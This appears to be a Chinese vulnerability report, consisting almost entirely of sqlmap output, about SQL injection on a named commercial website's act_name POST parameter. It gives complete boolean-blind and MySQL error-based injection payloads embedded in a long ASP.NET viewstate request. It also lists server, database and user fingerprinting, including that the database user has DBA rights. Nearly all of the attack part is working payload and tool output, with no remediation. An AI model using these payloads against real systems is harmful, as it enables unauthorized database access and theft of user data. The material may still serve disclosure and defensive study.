mysql 漏洞 wa_慧聪网某站点存在SQL注入漏洞涉及2W+条用户数据之三

Parameter: act_name (POST)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: __VIEWSTATE=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&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWBQLQ+7OfCQLmyba8DQKvnKOtAQLo442vBQK7l6b7Cu8JAfiPq8YfBMS1qvd2w9f9T6zL8lXp4rNIql4MTX2W&act_name=1%' AND 3304=3304 AND '%'='&goods_name=1&btnReport=%E6%90%9C%E7%B4%A2&AspNetPager_input=1Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause

Payload: __VIEWSTATE=/wEPDwULLTE4MjQ2OTQ1MTUPZBYCAgMPZBYEAgsPFgIeC18hSXRlbUNvdW50AgUWCgIBD2QWAmYPFQ0Y5pmo5qyjODIx57K+5ZOB6LGG5rWG5py6cuaYr+WQpua4heS7kyZuYnNwOyA8aW1nIGFsdD0iIiBzcmM9Ii9pbWFnZXMveWVzLmdpZiIgLz48YnIvPua4heS7k+aOqOiNkCZuYnNwOyA8aW1nIGFsdD0iIiBzcmM9Ii9pbWFnZXMvbm8uZ2lmIiAvPjnlvIDlp4s6MjAxNS0xMi0xNSAxMDowMDowMDxici8+57uT5p2fOjIwMTUtMTItMTggMDA6MDA6MDAMMuWkqTE05bCP5pe2AzIzMhjmmajmrKPnsr7lk4HosYbmtYbmnLo4MjEEMC4wMAQwLjAwATABMAEwATAAZAICD2QWAmYPFQ0S5pmo5qyj6LGG5rWG5py6ODE2cuaYr+WQpua4heS7kyZuYnNwOyA8aW1nIGFsdD0iIiBzcmM9Ii9pbWFnZXMveWVzLmdpZiIgLz48YnIvPua4heS7k+aOqOiNkCZuYnNwOyA8aW1nIGFsdD0iIiBzcmM9Ii9pbWFnZXMvbm8uZ2lmIiAvPjnlvIDlp4s6MjAxNS0xMi0xNSAxMDowMDowMDxici8+57uT5p2fOjIwMTUtMTItMjEgMTY6MDA6MDALNuWkqTblsI/ml7YENTA0MRLmmajmrKPosYbmtYbmnLo4MTYEMC4wMAQwLjAwATABMAMxNjIDMTYyzAI8YSBocmVmPSJqYXZhc2NyaXB0OnZvaWQoMCkiICBvbmNsaWNrPSJBY3RpdmVTdGF0aXN0aWNzRGV0YWlsUmVwb3J0KCfmmajmrKPosYbmtYbmnLo4MTYnLCfmmajmrKPosYbmtYbmnLo4MTYnLCcwaCwxaCwyaCwzaCw0aCw1aCw2aCw3aCw4aCw5aCwxMGgsMTFoLDEyaCwxM2gsMTRoLDE1aCwxNmgsMTdoLDE4aCwxOWgsMjBoLDIxaCwyMmgsMjNoJywnMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAnKSI+6K+m57uGPC9hPmQCAw9kFgJmDxUNJOS5kOmAlOWPluaaluWZqOeUteWPluaaluWZqE5TSC0xMihCKXLmmK/lkKbmuIXku5MmbmJzcDsgPGltZyBhbHQ9IiIgc3JjPSIvaW1hZ2VzL3llcy5naWYiIC8+PGJyLz7muIXku5PmjqjojZAmbmJzcDsgPGltZyBhbHQ9IiIgc3JjPSIvaW1hZ2VzL25vLmdpZiIgLz455byA5aeLOjIwMTUtMTItMTQgMTA6MDA6MDA8YnIvPue7k+adnzoyMDE1LTEyLTE3IDAwOjAwOjAwDDLlpKkxNOWwj+aXtgQ0NDY0JOS5kOmAlOWPluaaluWZqOeUteWPluaaluWZqE5TSC0xMihCKQQwLjAwBDAuMDABMAEwATgBOPACPGEgaHJlZj0iamF2YXNjcmlwdDp2b2lkKDApIiAgb25jbGljaz0iQWN0aXZlU3RhdGlzdGljc0RldGFpbFJlcG9ydCgn5LmQ6YCU5Y+W5pqW5Zmo55S15Y+W5pqW5ZmoTlNILTEyKEIpJywn5LmQ6YCU5Y+W5pqW5Zmo55S15Y+W5pqW5ZmoTlNILTEyKEIpJywnMGgsMWgsMmgsM2gsNGgsNWgsNmgsN2gsOGgsOWgsMTBoLDExaCwxMmgsMTNoLDE0aCwxNWgsMTZoLDE3aCwxOGgsMTloLDIwaCwyMWgsMjJoLDIzaCcsJzAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwJykiPuivpue7hjwvYT5kAgQPZBYCZg8VDRnpn6nlhqDmhaLpgJ/ljp/msYHmnLpCMTg4cuaYr+WQpua4heS7kyZuYnNwOyA8aW1nIGFsdD0iIiBzcmM9Ii9pbWFnZXMveWVzLmdpZiIgLz48YnIvPua4heS7k+aOqOiNkCZuYnNwOyA8aW1nIGFsdD0iIiBzcmM9Ii9pbWFnZXMvbm8uZ2lmIiAvPjnlvIDlp4s6MjAxNS0xMi0xMCAxMDowMDowMDxici8+57uT5p2fOjIwMTUtMTItMTUgMDA6MDA6MDAMNOWkqTE05bCP5pe2BDEwNDAZ6Z+p5Yag5oWi6YCf5Y6f5rGB5py6QjE4OAcxMDY4LjAwBjUzNC4wMAEyATYBMAE23gI8YSBocmVmPSJqYXZhc2NyaXB0OnZvaWQoMCkiICBvbmNsaWNrPSJBY3RpdmVTdGF0aXN0aWNzRGV0YWlsUmVwb3J0KCfpn6nlhqDmhaLpgJ/ljp/msYHmnLpCMTg4Jywn6Z+p5Yag5oWi6YCf5Y6f5rGB5py6QjE4OCcsJzBoLDFoLDJoLDNoLDRoLDVoLDZoLDdoLDhoLDloLDEwaCwxMWgsMTJoLDEzaCwxNGgsMTVoLDE2aCwxN2gsMThoLDE5aCwyMGgsMjFoLDIyaCwyM2gnLCcwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCw1MzQuMDAsMC4wMCw1MzQuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAnKSI+6K+m57uGPC9hPmQCBQ9kFgJmDxUNFeagvOWtkOeUteeBq+mUhUdaLUQzMXLmmK/lkKbmuIXku5MmbmJzcDsgPGltZyBhbHQ9IiIgc3JjPSIvaW1hZ2VzL3llcy5naWYiIC8+PGJyLz7muIXku5PmjqjojZAmbmJzcDsgPGltZyBhbHQ9IiIgc3JjPSIvaW1hZ2VzL25vLmdpZiIgLz455byA5aeLOjIwMTUtMTItMTAgMTA6MDA6MDA8YnIvPue7k+adnzoyMDE1LTEyLTE1IDAwOjAwOjAwDDTlpKkxNOWwj+aXtgQ1MDU0FeagvOWtkOeUteeBq+mUhUdaLUQzMQc2OTEyLjAwBjg2NC4wMAE4AzE0NAIxNgMxNjDeAjxhIGhyZWY9ImphdmFzY3JpcHQ6dm9pZCgwKSIgIG9uY2xpY2s9IkFjdGl2ZVN0YXRpc3RpY3NEZXRhaWxSZXBvcnQoJ+agvOWtkOeUteeBq+mUhUdaLUQzMScsJ+agvOWtkOeUteeBq+mUhUdaLUQzMScsJzBoLDFoLDJoLDNoLDRoLDVoLDZoLDdoLDhoLDloLDEwaCwxMWgsMTJoLDEzaCwxNGgsMTVoLDE2aCwxN2gsMThoLDE5aCwyMGgsMjFoLDIyaCwyM2gnLCcwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCw3NjguMDAsMC4wMCwzMDcyLjAwLDE1MzYuMDAsMC4wMCw3NjguMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDc2OC4wMCcpIj7or6bnu4Y8L2E+ZAINDw8WBB4LUmVjb3JkY291bnQClQEeEEN1cnJlbnRQYWdlSW5kZXgCAWRkZF0NHV9Lg94Cxmefq7EXaADjZGsbyGu/5Ejgya0HF49S&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWBQLQ+7OfCQLmyba8DQKvnKOtAQLo442vBQK7l6b7Cu8JAfiPq8YfBMS1qvd2w9f9T6zL8lXp4rNIql4MTX2W&act_name=1%' AND (SELECT 5121 FROM(SELECT COUNT(*),CONCAT(0x7171767a71,(SELECT (ELT(5121=5121,1))),0x71627a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='&goods_name=1&btnReport=%E6%90%9C%E7%B4%A2&AspNetPager_input=1

---

web server operating system: Windows 2008 R2 or 7

web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5

back-end DBMS: MySQL 5.0
current user: 'jdmall_test@%'
current database: 'jdmall_test'

current user is DBA: True